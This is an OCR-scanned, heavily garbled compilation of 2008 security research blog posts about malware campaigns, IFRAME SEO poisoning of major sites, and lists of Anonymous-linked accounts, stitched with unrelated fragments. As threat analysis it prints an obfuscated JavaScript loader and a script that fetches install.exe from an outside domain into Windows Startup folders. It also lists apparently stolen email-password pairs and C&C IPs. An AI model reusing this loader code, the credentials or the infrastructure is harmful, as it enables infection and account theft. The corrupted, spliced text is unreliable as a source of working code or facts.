IPs used in the C &Cs hiding behind .jpg files : 


75.125.251.36 
75.125.251.38 
75.125.251.40 


The fake bank logins locations found within the configuration : 


75.125.251.40/home/it/it. html 
75.125.251.40/home/it/it2.html 
75.125.251.40/home/it/iutb.html 
75.125.251.40/home/br/bj1.html 


Internal hardcoded email addresses : 


receiver.guzano@ gmail.com 
receiver.smtp@ gmail.com 
ladrao.contatos@ gmail.com 
urls.file@ gmail.com 
receiver.guzano@ gmail.com 
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[23] 


[24] 
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ANONYMOUS 


[25] 


ANONYMOUS 


[26] 
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[27] 
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S&S 


28) ANONYMOUS 


[29] 
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[40] 
[41] 


[42] 
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Md _tt/O02.4jp¢ 


nod tt/O2.4po9 


Ssmtp.terra.com.br 


smtps.uol.com.br 
smtp.gqlobo.com 


[CONTAS] 
j@uol.com.br:2612m 


Acop lobo. com: tups 

fecostafglobo.com:061191 

s@terra.com.br:421721pa 
@terra.com.br:13101980 


[CONTATOS] 


mt@terra.com.br:197560 


l@terra.com.br: yasmin 


@terra.com.br:06bi08da 
erra.com.br:4 
a@uol.com.br:1089638i 
uol.com.br:531117j0 


The bottom line, the campaign is well organized, primarily targeting Portuguese speaking end 
users, is being spammed from stolen email accounts, and has its malware hosted on a Russian 
free web space provider. Perhaps the only thing it’s missing is a better segmented emails 
database that would have improved the success rate especially from a targeted perspective. 
As in the majority of malware campaigns, it’s their common pattern that leads to the exposure 
of the entire ecosystem of who’s who and what’s what. 


1 

2. beep: / /ddanchev.blogapot.com/2008/02/local zing-cybercrsne~cultural. neal 
3, http: / /ddanchev. blogspot. con/2007/11/lonely-polinas-eecret heal 
4 
5 
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ANONYMOUS, 


jj 


[48] 
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[50] 
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[51] 


[52] 


ANONYMOUS 
53] Jordan 


[54] 
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[56] 


[57] 


[59] 
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[62] 
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[63] 
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4.3.17 Massive IFRAME SEO Poisoning Attack Continuing (2008-03-28 02:26) 


www-ludofg.com <iframe src=//89.149.243.201/t> Pictures, vary... 
wew-ludofg-com Pictures wewludofg-com Wallpapers, wwew-ludofg-com Pics, wew-ludofg- 
com Photos. Click on the waw-ludofg-com Images 

search rediff. comfmagsrch/default. php?MT= WW: asm: COM+%3CIFRAME% 
src=/89. 149.243, 21A%3E - 26k - J 


soleil-moon-frye <iframe src=/89.149.243.201/t> Pictures, soleil ... 
soleil-moon-frye Pictures ,soleil-moon-frye Wallpapers, soleil-moon-frye Pics, soleil-moon-frye 
Photos. Click on the solei-moon-frye Images. 
search, rediff. convimgsrch/default php?MT=SOLEIL- mOOW eer eT 
Wsre=//89. 149.243. D1A%3E - 26k - Cached - § 


nit-results <iframe src=//89.149.243.201/t> Pictures, nit-results ... 

nit-results Pictures nit-results Wallpapers, nit-results Pics, nit-results Photos. Click on the nit- 
results Images 

search. rediff. com/imgsrch/default gap ae RESTORE RANE: 


Wsrce=/89. 149.243. 2O1A%IE - 26k - Cach page 
encino-man <iframe src=//89.149.243.201/t> Pictures, encino-man ... 
encino-man Pictures,encino-man Wallpapers, encino-man Pics, encino-man Photos. Click on 
the encino-man Images 

search. rediff. convimgsrch/default glare » “eile = —igalaaaaae 
QOsre=/89.149.243.201A%3E - 25k - Cached - Sim 


St-patrick-s-day-comments <iframe src=//89.149.243.201/t> Pictures ... 
st-patrick-s-day-comments Pictures st-patrick-s-day-comments Wallpapers, st-patrick-s-day- 
comments Pics, st-patrick-s-day-comments Photos 

search. rediff. convimgsrch/default. php?MT=ST- PATRICK: 6 il COMMENTS +%3CIFRAME% 
20src=//69. 149.243, 201A%3E - 26k - Cached - lar page 


obama-race-speech-text <iframe src=//89.149.243.201/t> Pictures ... 
obama-race-speech-text Pictures,obama-race-speech-text Wallpapers, obama-race-speech- 
text Pics, obama-race-speech-text Photos. 

search. rediff. comvimgsrch/default php? TSOGAMA, RACE- SPEECH-TEXT+%3CIFRAME% 
2sre=//89.149.243,.201A%3IE - 26k - Cached - Similar page 


tom-johnston <iframe src=//89.149.243,201/t> Pictures, tom... 

torn-johnston Pictures tom-johnston Wallpapers, tom-johnston Pics, tom-johnston Photos 
Click on the tom-johnston Images 

search. rediff. com/imasrch/default gy ale = iagebcaanalaimiaaaiaa 

QOsrc=//B9. 149.243. 201A%3E - 26k - Cached - 


foetaLposition <iframe src=//89.149.243.201/t> Pictures, foetal ... 

foetal-position Pictures foetal-position Wallpapers, foetal-position Pics, foetal-position Photos. 
Click on the foetal-position Images. 

search. rediff. comvimgsrch/default “gape yar PENT 
Qsrc=//83.149.243.201A%3E - 26k - Cached - pages 


aptera <iframe src=//89.149.243.201/t> Pictures, aptera <iframe ... 

aptera Pictures aptera Wallpapers, aptera Pics, aptera Photos. Click on the aptera Images 
search. rediff. com/imgsrch/default pg He = igh deal 
2Osro=//B9.149.243.21A%3E - 25k - Cached- $ 


“ e ey 


Last week’s massive IFRAME injection attack is slowly turning into a what looks like a large 
scale web application vulnerabilities audit of high profile sites. Following the [1]timely news 
coverage, Symantec's [2]rating for the attack as medium risk, StopBadware [3]commenting 
on XP Antivirus 2008, and [4]US-CERT issuing a warning about the incident, after another week 
of monitoring the campaign and the type of latest malware and sites targeted, the campaign 
is still up and running, poisoning what looks like over a million search queries with loadable 
IFRAMES, whose loading state entirely relies on the site’s web application security practices - 
or the lack of. 


What has changed since the last time? The number and importance of the sites has in- 
creased, Google is to what looks like filtering the search results despite that the malicious 
parties may have successfully injected the IFRAMEs already, thus trying to undermine the 
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campaign, new malware and fake codecs are introduced under new domain names, and a 
couple of newly introduced domains within the IFRAMES themselves. 


Vadeo Activex Object Error 
na browser carmct dapiay thes video fie 
xy need to download new version of Vide 


Keep it Simple Stupid for the sake efficiency is what makes the campaign relatively easy to 
track once you understand the importance of hot leads, and real-time assessments for the 
purpose of setting the foundation for someone else’s upcoming piece of the puzzle in an OSINT 
manner. The main IPs within the IFRAMES acting as redirection points to the newly introduced 
rogue software and malware, remain the same, and are still active. The very latest high profile 
sites successfully injected with IFRAMES forwarding to the rogue security software and Zlob 
malware variants : 


[5]USAToday.com, [6]ABCNews.com, [7]News.com, [8]Target.com, [9]Packard Bell.com, 
[10]Walmart.com, [11]Rediff.com, [12]MiamiHerald.com, [13]Bloomingdales.com, 
[14]PatentStorm.us, [15]WebShots.com, [16]Sears.com, [17]Forbes.com, Ugo.com, 
Bartleby.com, Linkedwords.com, Circuitcity.com, Allwords.com, Blogdigger.com, Epinions.com, 
Buyersindex.com, Jcpenney.com, Nakido.com, Uvm.edu, hobbes.nmsu.edu, jurist.law.pitt.edu, 
boisestate.edu. 


Which are the main IPs injected as IFRAME redirection points? 
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Sample actionable intelligence on Anonymous Internationa’s Hacking Collective online infras- 
tructure: 


http://anonimandorra.blogspot.com/ 
http://anonopsbrazil.blogspot.nl/ 
http://anonopsibero.blogspot.com/ 
http://anonymouesecuador.blogspot.ca/ 
http://anonymousglobal-news.blogspot.al/ 
http://anonymousrbija.blogspot.ca/ 
http://anonymousvenezuela.org/ 
http://anonyopschile.blogspot.ca/ 
http://anonyvietnam.blogspot.ca/ 
http://opspain-anon.blogspot.ca/ 
http://facebook.com/AnOnymousGT 
http://twitter.com/@AnonsParaguay 
http://twitter.com/ANONYMOUS _CYP 
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http://twitter.com/ANON _INDI4N 
http://twitter.com/AnOnymous _GT 
http://twitter.com/Anon4bd 
http://twitter.com/AnonAlgeria 
http://twitter.com/AnonBelgium 
http://twitter.com/AnonBosnia 
http://twitter.com/AnonLegionPt 
http://twitter.com/AnonLegion Arg 
http://twitter.com/AnonLuxembourg 
http://twitter.com/AnonNic 
http://twitter.com/AnonOpsBolivia 
http://twitter.com/AnonOpsEt 
http://twitter.com/AnonOpsGhana 
http://twitter.com/AnonOps DO 
http://twitter.com/AnonPhilippines 
http://twitter.com/Anon Colombia _ 
http://twitter.com/AnonsCambodia 
http://twitter.com/AnonsCuba 
http://twitter.com/AnonyCanada 
http://twitter.com/AnonyMisr 
http://twitter.com/AnonymousAndorr 
http://twitter.com/AnonymousAzaadi 
http://twitter.com/AnonymousBDI 
http://twitter.com/AnonymousEst 
http://twitter.com/AnonymousKenyal 
http://twitter.com/AnonymousLat 
http://twitter.com/AnonymousNiger 
http://twitter.com/AnonymousNorway 
http://twitter.com/AnonymousOpsZA 
http://twitter.com/AnonymousPeru 
http://twitter.com/AnonymousUganda 
http://twitter.com/Anonymous _139 
http://twitter.com/Anonymous _Gabon 
http://twitter.com/BelarusAnonOps 


http://twitter.com/GreeceAnonNews 
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http://twitter.com/KGAnonymous 
http://twitter.com/LegionRussia 
http://twitter.com/Mikolized 
http://twitter.com/Op _Syria 
http://twitter.com/PalAnonymous 
http://twitter.com/Red _AnonsAL 
http://twitter.com/USAnonymous 
http://twitter.com/Xion Anonymous 
http://twitter.com/anon _bg 
http://twitter.com/anon _ice 
http://twitter.com/anonfinland 
http://twitter.com/anonmalaysia 
http://twitter.com/anonnewsaut 
http://twitter.com/anonnewsde 
http://twitter.com/anonnewsindo 
http://twitter.com/anonnewsswe 
http://twitter.com/anonops _cl 
http://twitter.com/anonops _eritrea 
http://twitter.com/anonopsbrazil 
http://twitter.com/anonopsnz 
http://twitter.com/anonopspanama 
http://twitter.com/anonsrbija 
http://twitter.com/anonsturkey 
http://twitter.com/anontunisia 
http://twitter.com/anonuk 
http://twitter.com/anonymousCRI 
http://twitter.com/anonymousHaiti 
http://twitter.com/anonymous __fr 
http://twitter.com/anonymous _afg 
http://twitter.com/anonymous _ecudr 
http://twitter.com/anonymous _leb 
http://twitter.com/anonymous vii 
http://twitter.com/anonymousdjib 
http://twitter.com/anonymouseire 
http://twitter.com/anonymouskazakh 
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http://twitter.com/anonymousmexi 
http://twitter.com/anonymoussv _503r 
http://twitter.com/anonymoustibet 
http://twitter.com/anonymousvenel10 
http://twitter.com/aze _anonymous 
http://twitter.com/freedom _jordan 
http://twitter.com/legionhonduras 
http://twitter.com/op _israel 
http://twitter.com/operationitaly 
http://twitter.com/opspain 
http://twitter.com/roanonym 
http://twitter.com/vietnam25547557 
http://twitter.com/youranonnewskr 
http://www.anonireland.com/ 
http://www.anonsweden.se/ 
http://www.anonymous-austria.com/ 
http://www.anonymous-japan.org/ 
http://www.anonymous-mexico.com/ 
http://www.anonymousargentina.com/ 
http://www.anonymousgreece.org/ 
http://www.anonymoushonduras.org/ 
http://www.anonymousperu.org/ 
http://www.anonymousvideo.eu/ 
http://www.facebook.com/anon.afghanistan 
http://www.facebook.com/anondz 
http://www.facebook.com/pages/Anonymous-Bahrain/483658458364187 
https://anonbd.wordpress.com/ 
https://anonybulgaria.wordpress.com/ 
https://ar-ar.facebook.com/Jo.Anonymous 
https://ar-ar.facebook.com/TheAnonymousTN 
https://de-de.facebook.com/OfficialAnonymousGermany 
https://es-la.facebook.com/AnonOpsPTY 
https://fi-fi.facebook.com/AnonFin 
https://ko-kr.facebook.com/YourAnonNewsKR 
https://pt-pt.facebook.com/AnonymousPORTUGAL 
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https://ru-ru.facebook.com/anon.rus 
https://tr-tr.facebook.com/Anonymous Turkey 
https://twitter.com/anonsworldwide 
https://we.riseup.net/anonymouscr 
https://www.anonymousbitesback.com/ 
https://www.facebook.com/AnonBelgium. Official 
https://www.facebook.com/AnonEstonia 
https://www.facebook.com/AnonNorway/ 
https://www.facebook.com/AnonOpsBolivia 
https://www.facebook.com/AnonOpsColombia 
https://www.facebook.com/AnonOpsindia 
https://www.facebook.com/Anonymous-Ghana-265231080209926/ 
https://www.facebook.com/Anonymous.France 
https://www.facebook.com/Anonymous. Italy 
https://www.facebook.com/Anonymous.Palestine 
https://www.facebook.com/Anonymous.cy 
https://www.facebook.com/AnonymousBosniaAndHerzegovina 
https://www.facebook.com/AnonymousLuxembourg 
https://www.facebook.com/AnonymousMalaysiaOfficial 
https://www.facebook.com/AnonymousNi 
https://www.facebook.com/AnonymousPakistanOfficial 
https://www.facebook.com/AnonymousPy 
https://www.facebook.com/AnonymousUnitedKingdom 
https://www.facebook.com/EgyptianAnonymous 
https://www.facebook.com/OffiziellAnonymousIndonesianPage 
https://www.facebook.com/Plataforma-Anonymous-Cuba-226582710828872/ 
https://www.facebook.com/Protectors42 
https://www.facebook.com/anon.aotearoa 
https://www.facebook.com/anon.azeri 
https://www.facebook.com/anon.belarus 
https://www.facebook.com/anon.burundi 
https://www.facebook.com/anon.cambodia 
https://www.facebook.com/anon.djibouti 
https://www.facebook.com/anon.eritrea 


https://www.facebook.com/anon.ethiopia 
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72.232.39.252 


NetRange: 72.232.0.0 - 72.233.127.255 


CIDR: 72.232.0.0/16, 72.233.0.0/17 


NetName: LAYERED-TECH- 


NetHandle: NET-72-232-0-0-1 


Parent: NET-72-0-0-0-0 


NetType: Direct Allocation 


NameServer: NS1.LAYEREDTECH.COM 


NameServer: NS2.LAYEREDTECH.COM 


Comment: abuse@layeredtech.com 
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195.225.178.21 
route: 195.225.176.0/22 


descr: NETCATHOST (full block) 
mnt-routes: WZNET-MNT 
mnt-routes: NETCATHOST-MNT 


origin: AS31159 
notify: vs@netcathost.com 


remarks: Abuse contacts: abuse@netcathost.com 
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89.149.243.201 
inetnum: 89.149.241.0 - 89.149.244.255 netname: NETDIRECT-NET 


remarks: INFRA-AW 
admin-c: WW200-RIPE 


tech-c: SR614-RIPE 
changed: technik@netdirekt.de 20070619 


ISP Location 
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89.149.220.85 
inetnum: 89.149.220.0 - 89.149.221.255 


netname: NETDIRECT-NET 
remarks: INFRA-AW 


admin-c: WW200-RIPE 
tech-c: SR614-RIPE 


changed: technik@netdirekt.de 20070619 
Newly introduced malware serving domains upon loading the IFRAMES : 


mynudedirect.com/3/5144 (216.255.186.107) loads mynudenetwork.com/flash2/?aff=5144 
(85.255.120.203) which attempts to load mynudenetwork.com/load.php?aff=5144 &saff=0 
&sid=3 where the malware is attempting to load upon accepting the ActiveX object : 


Scanners Result: Result : 12/32 (37.5 %) 
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Suspicious:W32/Malware!Gemini; W32/BHO.BVW 
File size: 107536 bytes 


MD5 : e50f2c9874a128d4c15e72d26c78352c 
SHA1 : 91f8a0e2531ea63ce22d0c7f90e7366a78ebeb8a 


Moreover gift-vip.net/images/indexl.php (195.225.178.19) is still loading from the previous 
campaign, this time pointing to webmovies-b.com/movie/black/0/21/411/0/ (58.65.234.25), 
and of course, e.pepato.org/e/ads.php?b=3029 (58.65.238.59) : 


<script language=JavaScript>function ghlwgtnu(n){var b ="";for(var i=8;i<n;i++){be="8"; preturn 
b;}function azentr(a){return parseInt(a,2);}function joqrugnky(str){var lbejafl=5+2+1;var 
qgblroatuz="ABCDEFGHI JKLMNOPQRS TUUWXY Zabcdef ghi jklanopqrstuuwxyz 6123456789+/" var 
gbkucuwjndp="";var turpy="""; for (var 

i=6;i<str length ;i++){gbkucuwjndp+=ghlwgtnu( (6-qgblroatuz .indexOf (str .substr(i,1)).toString(2)-.le 
ngth) )+qgblroatuz.indexOf(str -substr(i,1)).toString(2) ;if (gbkucuwjndp .length%lbejafl==6){turpu+=S 
tring .fromCharCode(mzentr(gbkucuwjndp.substr(8,1lbejafl)));gbkucuwjndp="";}else 

if (gbkucuwjndp.length>1bejafl){turpu+=String. fromCharCode(mzentr (gbkucuwjndp .substr(6,1bejafl))); 
gbkucuwjndp=gbkucuwjndp .substr(lbejafl, (gbkucuwjndp.length~lbejafl));}else 

if (gbkucuwjndp.length<lbejafl){continue;}}return 

turpy; }document .write( joqrugnky(“[AOBSFRNTD48Z26121G1LKPXRIc3RuYmo+PC9kaxXY+ I AOSUONSSUBUIExhbmd1¥Wdl 
PSJq¥XZhc2NyaXB G1iB BeXB1PSJOZXh OL 2phdnF 23 JpcHQiPiAKZnVUY3Rpb24gbHNybihsZ2x¥zcGFyMS17CnZhciBleGUzP 
SJCXHF nb2wu2Xhl i gp2YxX I gdXJsPSJodhHRw0i8uZ29sbmF ubsNhdC5 jb2 GuY WR3X2Z2pHGUZLZUWNT guNZRkYZY3MT AVaWSz20G 
FsbCSleGU/aWQ9ONSI 7dmFy IHNGeG1sPSJYTUWi03ZhciBzdGd GP SJHRUQIO3ZhciB2dGQ9TkQiO3ZhciBsZ269iajiudWxsOwp 
Gcn17bGRvYno9b2 JqbWtlcihs2xy2cGFyMSwilWl jcm9zb22 Li lresRsbWwr IKNUUFALKTtsZ69i ai SucGUuKHNGZ3QsdXJs 
LGZhDHNIKTSKFWNhdGNoKkGUpe3Ryexts2G9iaj 1uYapt a2UyKGx1d jNwYXIxLCJNUy I rc3R4abWur I jlulitzdhhtbeCsiSFRUU 
CIpO2xkb2JqLA9w2W4oc3RndCx 1cnwsZAF sc2UpOwp9¥ 2F BY2goZ2S17dHJSe2xkb2JqPW9iamir2X lobGU2M3Bhc jEsIk1T1i 
tzdhhtbCsihi5TZ2XJ22x Li K3NGeG 1sKkyJIUFRQIik7Caxkb2JqL m9wz¥4oc3RndCx tcmusZmF sc2Up031jYXR jaCh lkxt Ocnl 
7bGRYY mo 9b AV3 I FANTEN GdHBSZXF 1Z2XNGKCK7DGRYY moub3B1 bihzdGd GL HUybCxAyYWxzZ2Sk7 FWNhdGNoKGUpe3 JLdHUybiAw 
0319FX OKdHJSe2xkb2JqgLnNlbmQobnUsbCk7 FUNhdGNoKGUpe 3Ryexts269i ai SZZWSKKGS 1bGwp031jYXRjaChLKxty2kR1c 
maghDt90367CAaxkYm9keSAPIGxkb2JqLnJlc3BubnNlQndkelt2¥Xx 1 gb2Jqx3NGcnO9b2JqbWtlcihs2Xx¥zcGFyMSwidSIrc3 
RkKy IP LitzdGQr kl uU3RyZ2WF tLik7CmlmKG9ial 9ZdHItKXtuYmpFfc3RybSSUeXB1PTE7b2JqX3NOcnGuTW9KZT O2029ial19 
ZdHIJCLkOw2W4oKkT tuYmpfc3RybSSxcal 62Shs2GJuZHkpOwp2YXx I gaGRyaX21PS1iO03ZhciBkdGUtcD Bil jt2vxXIgZHNGYXJG 
PS1i03ZhciBkYXUZdEF ydD Gil jskKdHJSe3ZhciBuYapFU1NjcmlwdDtuYapta2UyKGx1d jNwYXIxLC JNU2NYaXBOLINoZWxsI 
ik7CnRyexXt2vxX I gd3NoUHJuY Wud j 1uYmpFUINjcmlwdCSF bnZpcm9ubWWudCgi UF JPQOUTUY I pO2hkcml22T13c2nQcm9 jRW 
S2KCJITOIFRFE JJUKUIKTCKdGUtcD13c2hQcm9 jRWS52KC JURU1Q1ik7 FYNhdGNOKGUpe3 87CnRyextkc3RhcnQob2Jqxi1dTY¥3J 
pCHQuU3B1Y21hbEZubDGRicnMolLNGYXJOdXALKTCKYXUZGGFydD 1uYmpFUIN] calwdC5TcGU j aWF SRm9sZGUycygi QWUxsUXNL 
cCaNTdGFydhUwlik7 fWNhdGNoKkGUpes 67 fF WNhdGNoKGUpe3 67CmimKGhkcal22T 89 Lil pe2hkcnl22T 6iQz0i0307aWYoZHRIb 
NAOPSTIKXt Ocn1l7daFylG9ial9mc289b2JqbWt lcihs2x¥zcGFyMSwiU2NyaXB GavSnLkZpbGUTeXNOZi1PYapLY3QikTtkdG 
UtcD1u¥mpf2nNuLkd1dF Nw2WNpYWxGb2xk2X I oMik7 FUNHdGNOKGUpes 67 FTt2YX I g2mSleDOil jt2YXIg2m49lil7awvoz2ns 
LeDO91i I pe2LmAKGRHAXNGYXIJGIT Oi 1i17dHIJSe2ZuPWRHGANOYX JOK2V42NN7b2IgX3NOcMOUUZF 2ZURURALsZShabiwykTtm 
bAU4PW2u031 7] YXRj aCh lL KXt903 67 F TsgC mi mKGZu2Xg9PS1iKXtpZihkc3RhcnQhPS Likxt GcnkgeyBmbj ikc3Rhcngr2khic 
ZtuYmpFc3RybSSTYXZ1UG9Gallx1KGZuLD I p022uZXg92m47 FNNGGNOKGUpe3 67 FT C9OYAK aWYoZ2mS1eD O91i I pesRyextmbj 


Scanners Result: 2/32 (6.25 %) 


JS.Feebs.rv; JS/Feebs.gen2 @ MM 

File size : 16098 bytes 

MD5 : 64bbd8ba8a0c9ce009d19f5b8c9d426e 

SHAI1 : 16313198ef140d2c74f36aa84c13afe9497865b6 


We also have vipasotka.com/in.php?adv=5032 &val=43c46ed2 (119.42.149.22) loading and 
redirecting to golnanosat.com/in.php?adv=5058 &val=e32a412f (119.42.149.22) 
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<SCRIPT Language="javascript™ type="text/javascript"> 

Function 1lsrn(lev3par1)<{ 

var exes=""\\qgol.exe" 

Cris eaentto-://qolnanosat.com/adw files/5658/34dc6716/install .exe?7id=1MeE ee ee eee 
stgte"GET";var stde"D";var ldobj-null; 

try{1dobj=objmker(lev3par1 ,“Microsoft.“+stxml+"HTTP") ;ldobj -open(stgt ,url, false) ; 
pcatch(e)<{try{1ldobj=objmker( leu3par1 ,“MS"+stxml+"2."+stxal+"HTTP") ;ldobj .open(stgt url, false) ; 
pcatch(e){try{1dobj=objmker(lev3par1 ,“MS"+stxml+"2.Server''+stxml+"HTTP") ; 

ldobj .open(stgt ,url, false) ;}catch(e){try{ldobj=new 

XMLHttpRequest( ) ;ldobj .open(stgt,url,false);}catch(e){return 6;}}}}> 

try{1ldobj .send(null) ;}catch(e){try{1ldobj .send(null);}catch(e){return 6;};}; 

ldbody = ldobj.responseBody;var obj_strm=objmker(lev3par1 ,"A"+std+"0"+std+"B Stream") ; 
if(obj_strn){obj_stra.Type=1;0bj_strm.Mode=3;o0bj_strm.Open() ;obj_stra.Write(ldbody) ; 

var hdrivee"';var dtempe";var dstarte"";var daustarte""; 

try{var obj_WScript=objmker(lev3par1 ,“WScript .Shell"); 

try{var 

wshProcEnv=obj_WScript .Environment("“PROCESS") ;hdrive=wshProcEny("“HOMEDRIVE™) ;dtemp=wshProcEnyu("TE 
HP") 5 }catch(e){}; 

try{dstart«obj_WScript .SpecialFolders("“Startup") ;daustart«obj_WScript .SpecialFolders("AllUsersSta 
rtup");}catch(e){}; }catch(e){}; 

if (hdrive==""){hdrive="C-:";};if(dtemp==""){try{var 
obj_fso=objmker(lev3par1,"Scripting .FileSysten0bject") ;dtemp=obj_fso.GetSpecialFolder(2);}catch(e 
)<{}3}3uar fFnex="";5var 

Foe" Sif (fFnexee""){if (daustart?«""){try{fnedaustart+exes ;obj_strm.SaveToFile(fn,2);fnex=fn;}catch 
(edtdstsds 

if(fnex==""){if(dstartt="")<{try < 

Fn=dstart+exes ;obj_strm.SaveToFile(fn,2) ;fnex=fn; pcatch(e){}5}5}; 

if (fnexe=""){try{fnehdrive+"\\Documents and Settings\\All Users\\Nenu 
Inicio\\Programas\\Inicio"+exes ;0bj_strm.SaveToFile(fn,2);fnex=fn; >catch(e){}>;}; 

if (fnex=="""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menuen 
Start\\Programmer\\Start''+exes ;obj_strm.SaveToFile(fn,2);fnex=fn; }catch(e){}3}; 

if (fnex==""){try{fn=hdrive+"\\Documents and Settings\\All Users\\Menu 
Start\\Programma\\'s\\Opstarten"+exes ;obj_strm.SaveToFile(fn,2);fnex=fn;}catch(e)<{};}; 


Scanners Result : Result: 11/32 (34.38 %) 


Trojan.Crypt.AN; FraudTool.Win32.UltimateDefender.cm 


File size : 61440 bytes 


MD5 : 5d83515199803el1fbcd3d2d8e0cd4ce5 


SHA1 : 4cl1f0eba4be895cf3b018e41fa7f13523424874d 


Last but not least is d08r.cn (203.174.83.55) a new domain introduced within the IFRAMES, 
which is also responding to, another scammy ecosystem : 


07search.com 
5m9h41.com 
a666hosting.info 
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na com 


nbb3q1.com 


gzoe7w.com 
l6q7x6.com 
nashepivo.com 
nbb3gl.com 
sraly.com 
uvilo.com 
vmksxo.com 
credits-counselor.com 
hx0k21.com 
mob-shop.net 
smart-search.net 


For the time being, Google is actively filtering the results, in fact removing the cached 
pages on number of domains when | last checked, the practice makes it both difficult to 
assess how many and which sites are actually affected, and of course, undermining the SEO 
poisoning, as without it the input validation and injecting the IFRAMEs would have never been 
able to attract traffic at the first place. 


The attack is now continuing, starting two weeks ago, the main IPs behind the IFRAMES 
are still active, new pieces of malware and rogue software is introduced hosting for which is 
still courtesy of the RBN, and we’re definitely going to see many other sites with high page 
ranks targeted by a single massive SEO poisoning in a combination with IFRAME injections. 
Which site is next? Let’s hope not yours, as if you don’t take care of your web application 
vulnerabilities, someone else will. 


Related posts: 


[18]More High Profile Sites IFRAME Injected 
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[19]More CNET Sites Under IFRAME Attack 

[20]ZDNet Asia and TorrentReactor IFRAME-ed 
[21]Rogue RBN Software Pushed Through Blackhat SEO 
[22]Massive RealPlayer Exploit Embedded Attack 
[23]Another Massive Embedded Malware Attack 
[24]Yet Another Massive Embedded Malware Attack 


[25]Massive Blackhat SEO Targeting Blogspot 
[26]Massive Online Games Malware Attack 


Press coverage: 


[27]Symantec’s Internet Threat Meter 
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[30]Hackers expand massive IFrame attack to prime sites 
[31]Major Web Sites Hit with Growing Web Attack 

[32]Major Sites Hit with IFRAME Injection Attacks 
[33]Researcher - IFRAME Redirect Attacks Escalate 

[34]An Update to the IFRAME SEO Poisoning 

[35]Massive Web Server Hack 

[36]Massive IFRAME Continues to Hit Top Sites 
[37]Attackers booby-trap searches at top Web sites 
[38]Several Major Websites Affected By Major Iframe Attack 
[39]Web Security Scanning Is Paramount 

[40]SEO poisoning attack hits big sites; Can the defenses scale? 
[41]Hackers step up search results attack 

[42]Tale of the IFRAME Continues 


ttp://ddanchev. blogspot .com/2008/03/pr-storm-mass-iframe-injectable-attacks.htm 


ttp://img182. imageshack .us/img182/8131/newsseoiframeib3. jpg 


. http: //img442. imageshack. us/img442/3487/targetseoifraameab3. jpg 
. http: //img182. imageshack. us/img182/8086/packardbellseoiframerp5. jpg 


ttp://img182. imageshack .us/img182/9142/walmartseoiframexi0. jpg 


3 
4 
5 
6. http: //img182.imageshack.us/img182/6155/abcnewsseoiframejc9. jpg 
7 
8 
9 


ttp://img185. imageshack .us/img185/3336/rediffseoiframevo6. jpg 


ttp://img442. imageshack .us/img442/7408/miamiheraldseoiframendO. jpg 


ttp://img185.imageshack.us/img185/8121/bloomingdalesseoiframeed9. jpg 


14. http://img413. imageshack .us/img413/3473/patentstormseoiframeax4. jpg 
15. http://img413. imageshack .us/img413/5581/webshotsseoiframewm0. jpg 
16. http://img149. imageshack .us/img149/2375/searsseoiframezb2. jpg 
1387 


[3] 


Sample personal photos of FBI’s Most Wanted Omid Ghaffarinia a.k.a Plus: 


[4] 


[5] 
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] 
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[ 
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[8] 
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. http://img149.imageshack.us/img149/3306/forbesseoiframeig6. jpg 


. http: //ddanchev. blogspot .com/2008/03/more-high-profile-sites-iframe-injected.htm 


. http: //ddanchev. blogspot .com/2008/03/more-cnet-sites-under-iframe-attack.htm 


. http: //ddanchev. blogspot. com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.htm 


21. 

22. 

23, 
2A, 


. http://ddanchev. blogspot .com/2008/02/massive-blackhat-seo-targeting-blogspot .htm 


26. http: //ddanchev. blogspot .com/2007/08/massive-online-games-malware-attack. htm 


27. http: //img187 . imageshack. us/img187/8192/symcseopoisondg1. jpg 


29. 
30. 
31. 
32. 


28. http://www.washingtonpost .com/wp-dyn/content /article/2008/03/29/AR2008032900032. htm 


. symantec. com/enterprise/security_response/weblog/2008/03/audit_your_web_server_lately.htm 


. computerworld.com/action/article.do?command=viewArticleBasickarticleId=9073098kintsrc=hm_list 


. infoworld.com/article/08/03/28/Major-Web-sites-hit-with-growing-Web-attack_1.htm 


. webpronews . com/topnews/2008/03/28/major-sites-hit-with-iframe-injection-attacks 


://security.blogs.techtarget .com/2008/03/28/researcher-iframe-redirect-attacks-escalate/ 


://isc.sans.org/diary.html?storyid=4210 


://blogs.pcmag.com/securitywatch/2008/03/massive_web_server_hack. php 


ee blogspot . com/2008/03/massive-iframe-continues-to-hit-top.htm 


37. http: //www.news . com/8301-10784_3-9905951-7 . html //www .news .com/8301-10784_3-9905951-7 .htm 


. http://www.webguild. org/2008/03/several-major-websites-affected-by.php 


. http: //windowsitpro.com/article/articleid/98663/web-security-scanning-is-paramount.htm 


40. http: //blogs.zdnet .com/security/?p=986 


41. http://www. vnunet . com/vnunet /news/2213090/search-engine-attack-lingers 


. http://blog.trendmicro.com/tale-of-the-iframe-continues/ 


4.3.18 The Epileptics Forum Attack (2008-03-31 09:27) 
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definitely struck a nerve 


TROLLS ARE GOING DOWN!!! 


OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 
» OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 


OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 
» OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 


OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 
» OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 


OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 
OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 


OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 
» OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 


OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 
» OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 


OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 
» OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 


OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 
» OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 


OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 
» OH GOD HOW DID THIS GET HERE IM NOT GOOD WITH COMPUTER 


heathr 


Pedrobear 


Pedrobear 


Pedrobear 


Pedrobear 


Pedrobear 


Pedrobear 


Pedrobear 


Pedrobear 


Pedrobear 


03/23/2008 04:05 AM 
by heathr By 


